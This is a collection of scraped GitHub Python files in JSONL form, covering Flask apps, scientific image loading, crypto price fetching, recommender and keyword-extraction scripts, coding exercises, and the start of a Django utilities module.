'p01':list(p10),'p11':list(p11)}\n metadict[\"xrange_um\"] = p01[0]-p00[0]\n metadict[\"yrange_um\"] = p11[1]-p00[1]\n\n return metadict\n\n\ndef getSIMetadict(metadat):\n matches = [line for line in metadat.split('\\n') if not 'SI.' in line]\n m = '\\n'.join(matches[1:-1])\n SImetadict = json.loads(m)\n\n roiGroups = SImetadict['RoiGroups']\n return SImetadict\n\n\n## LOAD AND RESHAPE IMAGE VOLUME ##\n\ndef loadvolume(path2tiff, basicMetadat, selectCaChan):\n vol = io.imread(path2tiff)\n\n #truncate in case aquisition was interrupted and the last volume was incomplete\n trunk = (vol.shape[0])%(basicMetadat['fpv'])\n if trunk > 0:\n vol = vol[:-trunk,:,:]\n\n vol = vol.reshape((int(vol.shape[0]/(basicMetadat['fpv'])),\n basicMetadat['fpv'],basicMetadat['nCh'],vol.shape[-2], vol.shape[-1]))\n # Full dimensional stack: volumes, planes, channels, xpix, ypix'\n\n if (selectCaChan):\n # Stack reduced to one color channel and flyback frames discrded\n vol = vol[:,0:basicMetadat['fpv']-basicMetadat['nDiscardFBFrames'],basicMetadat['CaCh'],:,:]\n\n return vol\n","repo_name":"hjmh/fly2p","sub_path":"fly2p/preproc/scanImageUtils.py","file_name":"scanImageUtils.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39080304835","text":"# import library\nfrom crypt import methods\nfrom pyexpat import model\nfrom flask import Flask, render_template, request\nfrom flask_restful import Resource, Api\nfrom flask_cors import CORS\nimport os\nimport librosa\nimport numpy as np\nimport librosa.feature\nimport pickle\nfrom models.knn import KNN\n# init object flask\napp = Flask(__name__)\n\n# init object flask restfull\napi = Api(app)\n\n# init cors\nCORS(app)\n\nres = {}\nmodel = pickle.load(open(\"models/model-vokal-a.pkl\", 'rb'))\n\n\n@app.route(\"/\")\ndef landing():\n return render_template(\"/index.html\")\n\n@app.route(\"/data\", methods=[\"GET\", \"POST\"])\ndef coba():\n if request.method == \"GET\":\n return res\n if request.method == 'POST':\n save_path = os.path.join(\"audio/\", \"temp.wav\")\n request.files['audio_data'].save(save_path)\n data = prediction()\n return data\n\ndef prediction():\n global model\n y, sr = librosa.load(\"audio/temp.wav\")\n mfcc = np.array(getMFCC(y))\n new_mfcc = np.array(mfcc)\n X = np.reshape(new_mfcc,(1, new_mfcc.size))\n res = model.predict(X)[0]\n return res[1]\n\ndef getMFCC(f):\n mfcc = librosa.feature.mfcc(y=f, n_mfcc = 13)\n return [np.ndarray.flatten(mfcc)][0]\n\nif __name__ == \"__main__\":\n app.run(debug=True, port = int(os.environ.get('PORT', 5000)))\n app.run()\n","repo_name":"IPRamaAnadya/Tugas-akhir","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42805806731","text":"#!/usr/bin/env python\nimport argparse\nimport copy\n\nfrom flask import Flask\nfrom flask import redirect, render_template, request, session, url_for\nimport yaml\n\nfrom db_connector import connector as conn\nfrom schema_reader import schemareader\nfrom analyse import analyse\n\ndb_conn = None\napp = Flask(__name__)\napp.secret_key = (\n '\\x16T@g\\xcf\\xdcGRzn\\xf5\\xc4\\x068\\xb9\\xf7\\xf7r]\\xf6d\\x96\\x9a\\xdd')\n\n\ndef configRead():\n config_dict = {}\n with open(\"config.yml\", \"r\") as configread:\n try:\n config_dict = yaml.load(configread)\n except yaml.YAMLError as exc:\n print(exc)\n return config_dict\n\n\n@app.route(\"/suggestions\", methods=[\"POST\", \"GET\"])\ndef suggestion_page():\n\tanalysis = analyse.Analyse(db_conn)\n\tprint(\"Starting Analysis.\")\n\tdf = analysis.data_read()\n\tprint(\"Fetched Data.\")\n\trecall,precision = analysis.create_model_and_validate(df)\n\tprint(\"Model created and validated.\")\n\treturn render_template(\"suggestions.html\",precision=precision,recall=recall)\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef connection_info():\n error = None\n global db_conn\n if request.method == \"POST\":\n config_dict = {}\n config_dict['db.type'] = request.form['connector-type']\n config_dict['db.hostname'] = request.form['hostname']\n # connect to DB\n db_conn = conn.DBConnector(config_dict)\n db_conn.connect()\n print(\"Connection established.\")\n schema_reader = schema_read(db_conn)\n print(\"Schema Read\")\n return redirect(url_for(\".suggestion_page\")) \n return render_template(\"conn-info.html\", error=error)\n\n\ndef schema_read(db_conn):\n # Read schema\n schema_reader = schemareader.SchemaReader(db_conn)\n schema_reader.read()\n return schema_reader\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"ronakmshah/network_analytics","sub_path":"netanalytics.py","file_name":"netanalytics.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1880714481","text":"\n# Async requests\nimport httpx\n\n\n# GETTTERS\n\n\n# Kraken's orderbook API last\n# cryptocoins asks\ndef get_orderbook():\n\n # Get cryptocoins in USD\n order_book = httpx.get(\n 'https://api.kraken.com/0/public/Depth?pair=XBTUSD&count=1')\n bitcoin_ask = float(order_book.json()['result']['XXBTZUSD']['asks'][0][0])\n order_book = httpx.get(\n 'https://api.kraken.com/0/public/Depth?pair=XETHZUSD&count=1')\n ethereum_ask = float(order_book.json()['result']['XETHZUSD']['asks'][0][0])\n\n # Convert to BRL\n exchange_usd_brl = httpx.get(\n 'https://economia.awesomeapi.com.br/json/last/USD-BRL')\n usd_brl = float(exchange_usd_brl.json()['USDBRL']['ask'])\n\n return {\n 'Kraken': {\n 'BTC': {\n 'Price(USD)': round(bitcoin_ask, 2),\n 'Price(BRL)': round(bitcoin_ask*usd_brl, 2)\n },\n 'ETH': {\n 'Price(USD)': round(ethereum_ask, 2),\n 'Price(BRL)': round(ethereum_ask*usd_brl, 2)\n }\n }\n }\n","repo_name":"terrotar/ExchangeAPI","sub_path":"app/crud/kraken.py","file_name":"kraken.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74106494828","text":"# Trying to derive a factoring scheme giving a quartic multiplication with two multiplies.\n# (e.g. maybe ((x+A)(x+B)+x+C)*(x+D) gives a general quartic.)\nimport sympy as sym\nimport itertools\n\n# a1,b1, a2,b2 = sym.symbols(\"a_1 b_1 a_2 b_2\")\n# x = sym.symbols(\"x\")\n# alpha1,beta1, alpha2,beta2 = sym.symbols(r\"\\alpha_1 \\beta_1 \\alpha_2 \\beta_2\")\n# A,B = sym.symbols(r\"A B\")\n# \n# P = (x**2 + a1*x + b1)*(x**2 + a2*x + b2)\n# P = P.expand()\n# Q = ((x + A)*(x + B) + alpha1*x + beta1) * ((x + A)*(x + B) + alpha2*x + beta2)\n# Q = Q.expand()\n# \n# for i in range(4):\n# # lprint(\"${}$\".format(i), P.coeff(x, i))\n# lprint(\"${}$\".format(i), Q.coeff(x, i))\n# \n# ldone()\n\n# a,b,c,d = sym.symbols(\"a b c d\")\n# x = sym.symbols(\"x\")\n# P = ((x + a)*(x + b) + c)**2 + d\n# P = P.expand()\n# for i in range(4+1):\n# lprint(\"${}$\".format(i), P.coeff(x, i))\n# \n# \n# M = sym.Matrix([[0,0,0,1,0,0,1,0,0,0,2,0,0,1],\n# [0,0,0,0,0,0,0,0,2,2,0,2,2,0],\n# [0,0,2,0,1,1,0,4,0,0,0,0,0,0],\n# [2,2,0,0,0,0,0,0,0,0,0,0,0,0]])\n# \n# lprint(\"\", M * M.transpose())\n# # lprint(\"\", M)\n# # lprint(\"\", M * M.transpose())\n# S = M.transpose() * (M * M.transpose()).inv()\n# lprint(\"\", S)\n# c0,c1,c2,c3 = sym.symbols(\"c_0 c_1 c_2 c_3\")\n# b = sym.Matrix([c0, c1, c2, c3])\n# v = S*b\n# lprint(\"\", v)\n# \n# lprint(\"\", M*v)\n# \n# \n# ldone()\n\na,b,c,d = sym.symbols(\"a b c d\")\nx = sym.symbols(\"x\")\nP = sym.Poly(((x + a)*(x + b) + c + x)**2 + d, x)\nM = []\n\nmonoms = []\nfor na,nb,nc,nd in itertools.product(range(0,2+1), repeat=4):\n monoms.append(a**na * b**nb * c**nc * d**nd)\n \nfor i in range(4+1):\n row = []\n coeff = P.coeff_monomial(x**i)\n p = sym.Poly(coeff, a,b,c,d)\n for na,nb,nc,nd in itertools.product(range(0,2+1), repeat=4):\n monom = a**na * b**nb * c**nc * d**nd\n row.append(p.coeff_monomial(monom))\n M.append(row)\nM = sym.Matrix(M)\n \n# lprint(\"\", M * M.transpose())\n# lprint(\"\", M)\n# lprint(\"\", M * M.transpose())\nS = M.transpose() * (M * M.transpose()).inv()\n# lprint(\"\", S)\nc0,c1,c2,c3,c4 = sym.symbols(\"c_0 c_1 c_2 c_3 c_4\")\nB = sym.Matrix([c0, c1, c2, c3, c4])\nv = S*B\n# lprint(\"\", v)\n# lprint(\"\", M*v)\n\nA = v[monoms.index(a)]\nB = v[monoms.index(b)]\nC = v[monoms.index(c)]\nD = v[monoms.index(d)]\nprint(A)\nprint(B)\nprint(C)\nprint(D)\nprint(P)\nPP = P.subs({a:A, b:B, c:C, d:D}).as_expr().simplify()\nprint(PP)\n\n\n# ldone()\n","repo_name":"LucasPayne/python_math","sub_path":"polynomial_evaluation.py","file_name":"polynomial_evaluation.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24123468964","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 08:56:15 2019\n\n@author: ananth\n\"\"\"\n\nimport turicreate as tc\nimport sqlite3 \n\n# Load dataset\nconn = sqlite3.connect(\"msd.sqlite3\")\nlistens = tc.SFrame.from_sql(conn, \"SELECT * FROM train\")\nsongs_df = tc.SFrame.from_sql(conn, \"SELECT * FROM song\")\n\n# Create Training set and test set\ntrain_data, test_data = tc.recommender.util.random_split_by_user(listens, \"userID\", \"songID\")\n\nmodel3 = tc.recommender.factorization_recommender.create(train_data, user_id=\"userID\", item_id=\"songID\", target=\"plays\")\n\nrecc = model3.recommend()\n\nsong_recommendations = recc.join(songs_df, on=\"songID\", how=\"inner\").sort('rank')\n\nprint(song_recommendations)\n\n# Evaluate the model\nrmse_m3 = model3.evaluate_rmse(test_data, target=\"plays\")\n\n# Print the results\nprint(rmse_m3)","repo_name":"antgouri/RecommSys","sub_path":"Music Recommeder System/MatrixFactor_RecSys.py","file_name":"MatrixFactor_RecSys.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74509233386","text":"import os\nfrom shutil import copyfile\nimport pickle\nfrom config import Args\nargs = Args()\ndata_dir = args.dir_processed_data_for_datamap\nwith open(os.path.join(data_dir, \"label_dict.pkl\"), \"rb\") as f_in:\n label_dict = pickle.load(f_in)\n\nsplits = [\"train\", \"dev\", \"test\"]\nfor _split in splits:\n with open(os.path.join(data_dir, f\"{_split}.tsv\"), \"r\", encoding='utf-8') as f_in:\n buf = f_in.readlines()\n # rule out empty lines\n buf = [x for x in buf if len(x.strip()) > 0]\n copyfile(os.path.join(data_dir, f\"{_split}.tsv\"), os.path.join(data_dir, f\"{_split}_backup.tsv\"))\n with open(os.path.join(data_dir, f\"{_split}.tsv\"), \"w\", encoding='utf-8') as f_out:\n headers = buf[0].strip().split(\"\\t\")\n # headers = headers[: -1] + [\"human_label\", ] + headers[-1: ]\n headers = headers[: -1] + [\"human_label\", \"label\"]\n headers = '\\t'.join(headers)\n f_out.write(f\"{headers}\\n\")\n for i in range(1, len(buf)):\n fields = buf[i].strip().split(\"\\t\")\n fields = fields + [str(label_dict[fields[-1]]), ]\n content = \"\\t\".join(fields)\n f_out.write(f\"{content}\\n\")\n\n\n","repo_name":"yangalan123/DataMap-Project","sub_path":"data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"69823381548","text":"import matplotlib.pylab as pylab\nimport sys\n\n\ndef main():\n data = [x.strip() for x in open(sys.argv[1]).readlines()[1:-1]]\n\n fields = [x.split(' ') for x in data]\n\n def get(desired_key, data):\n result = []\n for line in data:\n for field in line:\n if '=' not in field:\n continue\n key, val = field.split('=')\n if key == desired_key:\n result.append(int(val))\n break\n else:\n raise RuntimeError(f\"Key {desired_key} not found\")\n return result\n pylab.plot(get(\"i1\", fields), label='cur1')\n pylab.plot(get(\"i2\", fields), label='cur2')\n pylab.plot(get(\"i3\", fields), label='cur3')\n pylab.legend()\n pylab.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarioRoldan97/ROBGAM_MOTEUS","sub_path":"utils/plot_cal_phase_currents.py","file_name":"plot_cal_phase_currents.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23845177796","text":"# This is the longest substring after one .\n\n\n# Given an array containing 0s and 1s, if you are allowed to replace no more than ‘k’ 0s with 1s, find the length of the longest contiguous subarray having all 1s.\n\n\n# [ 0 1 1 1 0 1 1 1 0 ] k =2 \n# This is a sliding window problem where we are going to have a start window value and an end window value. we wil move through every element of the array and check the number of 0's in the current subarry. We also persist the max number of 1's in the substring and check if the number of 0's in the subtring which can be replaced is no more than the k values \n \n\n# this problem will use a sliding window solution \n# I count the number of ones in a window section and persit it \n# for every window, I make sure I have the same number of replaceale ones which are allowed to be replaced with a 1.\n# If the number of replaceable o's are more than k, then I shrink the string by increasing the start window . \n\n# [ 1 0 1 0 0 0]\nclass Solution:\n def __init__(self,arr,k):\n self.arr = arr \n self.k = k \n\n def get_longest_subtring(self):\n window_start = 0\n max_length = 0 \n max_ones_count = 0 \n for window_end in range(len(arr)):\n if arr[window_end] == 1:\n max_ones_count += 1 \n replaceable_zeros = window_end-window_start +1 - max_ones_count\n\n if replaceable_zeros > k:\n if arr[window_start] == 1:\n max_ones_count -=1 \n window_start += 1 \n\n max_length = max(max_length, window_end-window_start+1)\n\n return max_length\n\n\n\n\nif __name__ == \"__main__\":\n k = int(input())\n arr = list(map(int,input().rstrip().split()))\n solution = Solution(arr,k)\n results = solution.get_longest_subtring()\n print(results)\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# class Solution:\n# def __init__(self,arr, k ):\n# self.arr = arr \n# self.k = k\n\n# def get_longest_subtring(self):\n\n \n# window_start = 0 \n# max_ones_count = 0 \n# max_length = 0 \n# for window_end in range(len(arr)):\n# if arr[window_end] == 1:\n# max_ones_count +=1 \n\n# replaceable_zeros = window_end - window_start+1 - max_ones_count \n# if replaceable_zeros > k:\n# if arr[window_start] == 1 :\n# max_ones_count -=1\n# window_start += 1 \n# max_length = max(max_length,window_end- window_start+1)\n\n# return max_length\n\n\n\n\n# if __name__ == \"__main__\":\n# k = int(input())\n\n# arr = list(map(int,input().rstrip().split()))\n\n# solution = Solution(k,arr)\n# results = solution.get_longest_subtring()\n# print(results)","repo_name":"markowusu/DS-and-Algos-","sub_path":"LongestSubtringAfterOne.py","file_name":"LongestSubtringAfterOne.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23605555128","text":"\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer as v\n\nstopwords = [word.strip() for word in open('stopwords').readlines()]\n\ndef keywordExtraction(docs, globalKeywords, minTokens=2, defaultKeywordScore=0, factor=1):\n tfidf = v(use_idf=True, stop_words=stopwords)\n\n dataset = ['%s\\n%s' % (doc['title'], doc['abstract']) for doc in docs]\n tfidf.ngram_range = (2,2)\n model = tfidf.fit_transform(dataset)\n df = pd.DataFrame(model[0].T.todense(), index=tfidf.get_feature_names(), columns=[\"TF-IDF\"])\n keywordsDict = df.to_dict()['TF-IDF']\n\n keywords = list(keywordsDict.items())\n keywords.sort(key = lambda x : -x[1])\n\n return keywords\n","repo_name":"VinGarcia/psychology-keyword-extractor","sub_path":"strategies/tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2936612108","text":"import logging\n\n\ndef init_logging():\n # logger = logging.root\n # use 'airtest' as root logger name to prevent changing other modules' logger\n logger = logging.getLogger(\"airtest\")\n logger.setLevel(logging.DEBUG)\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n fmt='[%(asctime)s][%(levelname)s]<%(name)s> %(message)s',\n datefmt='%H:%M:%S'\n )\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\ninit_logging()\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n return logger\n","repo_name":"AirtestProject/Airtest","sub_path":"airtest/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":7514,"dataset":"github-code","pt":"37"} +{"seq_id":"39730698323","text":"file = open(\"arquivo.txt\", mode=\"w\")\n\nfile.write(\"Marcos 10\\n\")\nfile.write(\"Felipe 4\\n\")\nfile.write(\"José 6\\n\")\nfile.write(\"Ana 10\\n\")\nfile.write(\"Maria 9\\n\")\nfile.write(\"Miguel 5\\n\")\n\nfile.close()\n\nrecuStudents = []\nwith open(\"arquivo.txt\") as gradesFile:\n for line in gradesFile:\n student_grade = line\n student_grade = student_grade.split(\" \")\n if int(student_grade[1]) < 6:\n recuStudents.append(student_grade[0] + \"\\n\")\n\n\nwith open(\"recuStudents.txt\", mode=\"w\") as recuStudentsFile:\n print(recuStudents)\n recuStudentsFile.writelines(recuStudents)\n","repo_name":"martin-bachmann/trybe-exercises","sub_path":"ciencia-computacao/secao-1-introducao-a-python/dia-2-entrada-e-saida-de-dados/exeptions.py","file_name":"exeptions.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17780809428","text":"\"\"\"\nCreate a new class `PersonIdentification` with the following attributes:\n\n- `first_name` - the first name of the person\n- `last_name` - the last name of the person\n- `id_number` - the id number if the person [EGN]\n\n> It takes all if them as arguments in the constructor\n\nCreate a new class `BankAccountWallet` with the following attributes:\n\n- `owner: PersonIdentification` - the owner of the wallet - he is of type `PersonIdentification`\n- `balance: float` - the money balance in the wallet\n- `account_identificator` - a number that uniquely identifies the account - can be autoincremented\n using `Class attributes`\n - https://dzone.com/articles/python-class-attributes-vs-instance-attributes\n\nIt defines and implements the following methods too:\n\n- `deposit()` - adds money to the balance\n- `withdraw()` - removes money from the balance if enough\n- `print_balance()` - prints the balance in this format `balance: {balance}`\n\n1. Create a new instance of `BankAccountWallet`\n1. Deposit money to it (1000 dollars)\n1. Print the balance\n1. Withdraw money from it (755.3)\n1. Print the balance\n\"\"\"\n\n\nclass PersonIdentification:\n def __init__(self, first_name: str, last_name: str, id_number: str):\n self.first_name = first_name\n self.last_name = last_name\n self.id_number = id_number\n\n\nclass BankAccountWallet:\n def __init__(self, owner: PersonIdentification, account_identificator: int):\n self.owner = owner\n self.balance = 0.0\n self.account_identificator = account_identificator\n\n def deposit(self, amount: float):\n self.balance = self.balance + amount\n\n def withdraw(self, amount: float):\n if self.balance < amount:\n print(\"Not enough money\")\n else:\n self.balance = self.balance - amount # self.balance -= amount\n\n def print_balance(self):\n print(\"balance: \" + str(self.balance))\n\n\nif __name__ == '__main__':\n owner = PersonIdentification(\"Petar\", \"Atanasov\", \"044123132\")\n wallet = BankAccountWallet(owner, 1)\n wallet.deposit(1000.0)\n wallet.print_balance()\n wallet.withdraw(755.3)\n wallet.print_balance()\n\n","repo_name":"genchev99/ia-lectures","sub_path":"lecture_11/solutions/problem_01.py","file_name":"problem_01.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34946791501","text":"import sys\r\n\r\n\r\ndef main():\r\n input_data = sys.stdin.read()\r\n\r\n # part one\r\n parser = ProtocolParser(marker_size=4)\r\n\r\n for char in input_data:\r\n parser.put_char(char)\r\n\r\n if parser.marker_detected:\r\n print(parser.index)\r\n break\r\n\r\n # part two\r\n parser = ProtocolParser(marker_size=14)\r\n\r\n for char in input_data:\r\n parser.put_char(char)\r\n\r\n if parser.marker_detected:\r\n print(parser.index)\r\n break\r\n\r\n\r\nclass ProtocolParser:\r\n def __init__(self, marker_size: int):\r\n self.index = 0\r\n self.marker_detected = False\r\n self.marker_buffer = ''\r\n self.marker_size = marker_size\r\n\r\n def put_char(self, char: str):\r\n assert len(char) == 1\r\n\r\n self.index += 1\r\n\r\n if len(self.marker_buffer) < self.marker_size:\r\n self.marker_buffer += char\r\n else:\r\n self.marker_buffer = self.marker_buffer[1:] + char\r\n\r\n if len(set(self.marker_buffer)) == self.marker_size:\r\n self.marker_detected = True\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"mjaun/adventofcode","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26218015883","text":"from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom gestionPedidos.models import articulo\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom gestionPedidos.forms import FormularioContacto\n\n# Create your views here.\n\n\ndef busqueda_productos(request): #aca se define una funcion para crear una pagina de busqueda de un producto\n\n return render(request, \"busqueda_productos.html\")\n\ndef buscar(request): #aca se crea esta funcion para devolver la busqueda con el mensaje guardado en la variable mensaje de la busqueda_producto.html\n\n if request.GET[\"prd\"]:\n\n\n #mensaje=\"Artículo buscado: %r\" %request.GET[\"prd\"]\n producto=request.GET[\"prd\"]\n if len(producto)>20:\n\n mensaje=\"Texto de búsqueda demasiado largo\"\n\n else:\n\n articulos=articulo.objects.filter(nombre__icontains=producto)\n\n return render(request, \"resultados_busquedas.html\", {\"articulos\":articulos, \"query\":producto})\n\n else:\n mensaje=\"No has introducido un búsqueda válida. Favor de intentar nuevamente\"\n\n return HttpResponse(mensaje)\n\n## en las siguientes lineas de codigo, se crea una funcion para poder enviar correos electronicos automaticos\n# revisar en setting.py y en views.py para obtener mas ayuda de la creacion de estos paramteros.\ndef contacto(request):\n\n if request.method==\"POST\":\n\n miFormulario=FormularioContacto(request.POST)\n\n if miFormulario.is_valid():\n\n infForm=miFormulario.cleaned_data\n\n send_mail(infForm['asunto'], infForm['mensaje'], infForm.get('email',''),['tomas.prueba.stuardo@gmail.com'],)\n\n return render(request, \"gracias.html\")\n \n else:\n\n #Este formulario se puede hacer con una api form o crearlo directamente\n\n miFormulario=FormularioContacto()\n\n return render(request, \"formulario_contacto.html\", {\"form\":miFormulario})\n\n\n #subject=request.POST[\"asunto\"]\n\n #mensajes=request.POST[\"mensaje\"] + \" \" + request.POST[\"email\"]\n\n # email_from=settings.EMAIL_HOST_USER\n\n #recibiendo_list=[\"tomas.prueba.stuardo@gmail.com\"]\n\n #send_mail(subject, mensajes, email_from, recibiendo_list)\n\n #return render (request, \"gracias.html\")\n\n #else:\n # mensaje=\"No ha sido posible enviar su mensaje\"\n\n #return render (request, \"contacto.html\")","repo_name":"Tom45Stv4rd0/TiendaOnline_Python_Django","sub_path":"gestionPedidos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27078006252","text":"''' This file contains global variables used in image processing package\r\n'''\r\nimport numpy as np\r\n\r\ndef initialise():\r\n global A # image pixel intensity matrix\r\n global rows # number of rows in image intensity matrix\r\n global columns # number of columns in image intensity matrix\r\n global maxGray # maximum intensity possible in image = 2**N -1, N: number of bits used\r\n global hist # 1-D histogram of the intensity matrix\r\n global bitList # list of matrices of bits after bit slicing \r\n global A87 # image intensity matrix after comibing bits 7 and 8\r\n global A876\r\n \r\n\r\n A=[]\r\n rows=0\r\n columns=0\r\n maxGray=0\r\n hist=[]\r\n bitList=[]\r\n A87=[]\r\n A876=[]\r\n","repo_name":"Sujata018/Image-Processing","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33038704716","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nFunctions used in other modules.\n\"\"\"\nfrom django.core.paginator import Paginator, Page, EmptyPage, PageNotAnInteger\nfrom django.core.mail.message import EmailMessage\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom django.template.loader import render_to_string, get_template\nfrom django.template.defaultfilters import filesizeformat\nfrom django.template.defaultfilters import slugify\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.sites.models import Site\nfrom django.utils.encoding import force_unicode\nfrom django.utils.timezone import utc\nfrom django.conf import settings\n\nfrom apps.backend import AppMessage\nfrom apps.backend.html2text import html2text\n\nfrom datetime import datetime\nfrom time import strptime, strftime\nfrom PIL import Image\n\nimport xhtml2pdf\nimport xhtml2pdf.pisa as pisa\nimport cStringIO as StringIO\nimport random, string, re, os, sys\n\n\"\"\"\nCreating a unique slug depending on the model.\nslugify_unique\n\"\"\"\n\nLATIN_MAP = {\n u'À': 'A', u'Á': 'A', u'Â': 'A', u'Ã': 'A', u'Ä': 'A', u'Å': 'A', u'Æ': 'AE', u'Ç':'C', \n u'È': 'E', u'É': 'E', u'Ê': 'E', u'Ë': 'E', u'Ì': 'I', u'Í': 'I', u'Î': 'I',\n u'Ï': 'I', u'��': 'D', u'Ñ': 'N', u'Ò': 'O', u'Ó': 'O', u'Ô': 'O', u'Õ': 'O', u'Ö':'O', \n u'Ő': 'O', u'Ø': 'O', u'Ù': 'U', u'Ú': 'U', u'Û': 'U', u'Ü': 'U', u'Ű': 'U',\n u'Ý': 'Y', u'Þ': 'TH', u'ß': 'ss', u'à':'a', u'á':'a', u'â': 'a', u'ã': 'a', u'ä':'a', \n u'å': 'a', u'æ': 'ae', u'ç': 'c', u'è': 'e', u'é': 'e', u'ê': 'e', u'ë': 'e',\n u'ì': 'i', u'í': 'i', u'î': 'i', u'ï': 'i', u'ð': 'd', u'ñ': 'n', u'ò': 'o', u'ó':'o', \n u'ô': 'o', u'õ': 'o', u'ö': 'o', u'ő': 'o', u'ø': 'o', u'ù': 'u', u'ú': 'u',\n u'û': 'u', u'ü': 'u', u'ű': 'u', u'ý': 'y', u'þ': 'th', u'ÿ': 'y'\n}\nLATIN_SYMBOLS_MAP = {\n u'©':'(c)'\n}\nGREEK_MAP = {\n u'α':'a', u'β':'b', u'γ':'g', u'δ':'d', u'ε':'e', u'ζ':'z', u'η':'h', u'θ':'8',\n u'ι':'i', u'κ':'k', u'λ':'l', u'μ':'m', u'ν':'n', u'ξ':'3', u'ο':'o', u'π':'p',\n u'ρ':'r', u'σ':'s', u'τ':'t', u'υ':'y', u'φ':'f', u'χ':'x', u'ψ':'ps', u'ω':'w',\n u'ά':'a', u'έ':'e', u'ί':'i', u'ό':'o', u'ύ':'y', u'ή':'h', u'ώ':'w', u'ς':'s',\n u'ϊ':'i', u'ΰ':'y', u'ϋ':'y', u'ΐ':'i',\n u'Α':'A', u'Β':'B', u'Γ':'G', u'Δ':'D', u'Ε':'E', u'Ζ':'Z', u'Η':'H', u'Θ':'8',\n u'Ι':'I', u'Κ':'K', u'Λ':'L', u'Μ':'M', u'Ν':'N', u'Ξ':'3', u'Ο':'O', u'Π':'P',\n u'Ρ':'R', u'Σ':'S', u'Τ':'T', u'Υ':'Y', u'Φ':'F', u'Χ':'X', u'Ψ':'PS', u'Ω':'W',\n u'Ά':'A', u'Έ':'E', u'Ί':'I', u'Ό':'O', u'Ύ':'Y', u'Ή':'H', u'Ώ':'W', u'Ϊ':'I',\n u'Ϋ':'Y'\n}\nTURKISH_MAP = {\n u'ş':'s', u'Ş':'S', u'ı':'i', u'İ':'I', u'ç':'c', u'Ç':'C', u'ü':'u', u'Ü':'U',\n u'ö':'o', u'Ö':'O', u'ğ':'g', u'Ğ':'G'\n}\nRUSSIAN_MAP = {\n u'а':'a', u'б':'b', u'в':'v', u'г':'g', u'д':'d', u'е':'e', u'ё':'yo', u'ж':'zh',\n u'з':'z', u'и':'i', u'й':'j', u'к':'k', u'л':'l', u'м':'m', u'н':'n', u'о':'o',\n u'п':'p', u'р':'r', u'с':'s', u'т':'t', u'у':'u', u'ф':'f', u'х':'h', u'ц':'c',\n u'ч':'ch', u'ш':'sh', u'щ':'sh', u'ъ':'', u'ы':'y', u'ь':'', u'э':'e', u'ю':'yu',\n u'я':'ya',\n u'А':'A', u'Б':'B', u'В':'V', u'Г':'G', u'Д':'D', u'Е':'E', u'Ё':'Yo', u'Ж':'Zh',\n u'З':'Z', u'И':'I', u'Й':'J', u'К':'K', u'Л':'L', u'М':'M', u'Н':'N', u'О':'O',\n u'П':'P', u'Р':'R', u'С':'S', u'Т':'T', u'У':'U', u'Ф':'F', u'Х':'H', u'Ц':'C',\n u'Ч':'Ch', u'Ш':'Sh', u'Щ':'Sh', u'Ъ':'', u'Ы':'Y', u'Ь':'', u'Э':'E', u'Ю':'Yu',\n u'Я':'Ya'\n}\nUKRAINIAN_MAP = {\n u'Є':'Ye', u'І':'I', u'Ї':'Yi', u'Ґ':'G', 